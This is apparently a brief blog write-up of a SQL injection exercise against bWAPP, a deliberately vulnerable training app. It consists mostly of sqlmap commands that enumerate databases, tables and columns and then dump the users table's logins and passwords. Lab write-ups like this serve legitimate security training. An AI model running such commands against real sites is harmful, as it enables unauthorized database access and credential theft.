bWAPP WriteUp

Pub Date: 2023-10-16

SQL Injection (GET/Select)

low level

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -f --banner --dbs --users -v 3

set level 3

sqlmap --cookie "PHPSESSID=atbgcf325gg6871ee7ilcn2ak3; security_level=0" -u "https://bwapp.hakhub.net/sqli_2.php?movie=1&action=go" -f --banner --dbs --users -v 3 --level 3

set http_proxy for sqlmap

sqlmap --cookie "PHPSESSID=atbgcf325gg6871ee7ilcn2ak3; security_level=0" -u "https://bwapp.hakhub.net/sqli_2.php?movie=1&action=go" -f --banner --dbs --users -v 3 --level 3 --proxy http://demo.com:8080

get databases

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs

set database to bWAPP and get tables

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs -D bWAPP -tables

set database to bWAPP and set tables to users and get columns

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs -D bWAPP -tables -T users -columns

set database to bWAPP and set tables to users and get columns by column name

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs -D bWAPP -tables -T users -columns -C login password -dump-all

we can get user name and password

Andrew's Blog

bWAPP WriteUp

SQL Injection (GET/Select)

low level